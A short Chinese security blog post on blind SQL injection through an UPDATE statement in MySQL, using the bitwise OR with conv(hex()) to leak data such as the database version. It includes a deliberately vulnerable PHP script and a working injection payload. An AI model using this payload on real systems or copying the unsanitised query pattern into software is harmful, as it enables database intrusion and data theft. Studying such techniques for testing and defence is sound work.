关闭显错下的update注入

不畏将来,不念过往。如此,安好!

Someone famous 丰子恺

Mysql 特性 当字符串和数值进行或运算时,将得到数字;只在非严格模式下有效

mysql> select 'abc'|123;
+-----------+
| 'abc'|123 |
+-----------+
| 123 |
+-----------+
1 row in set, 1 warning (0.00 sec)

mysql> select user()|123;
+------------+
| user()|123 |
+------------+
| 123 |
+------------+
1 row in set (0.00 sec)

如存在一下:

$mysqli = new mysqli("localhost","root","root","security");
if($mysqli->connect_errno) {
printf("Connect failed: %s\n",$mysqli->connect_errno);
exit();
}
$mysqli->query("set names utf8");
$id = @$_GET['id'];
$username = @$_GET['username'];

$sql1 = "update users set username='$username' where id='$id'";
var_dump($sql1);
$sql2 = "select * from users where id='$id'";
var_dump($sql2);
$result = $mysqli->query($sql1);
if($result = $mysqli->query($sql2)) {
$row = $result->fetch_array(MYSQLI_ASSOC);
echo "ID=".$id.'的用户名变为'.$row['username'];
$result->close();
} else {
var_dump($mysqli->error);
}

$mysqli->close();
d=1&username=tom'|conv(hex(version()),16,10)|'

即可注入成功,当然数值是64位限制,长字符串需要分割:)

标签 Sql注入

注意!

Warning! 有一定的局限性,select ,conv ...etc ,() 可能存在过滤 关注一下!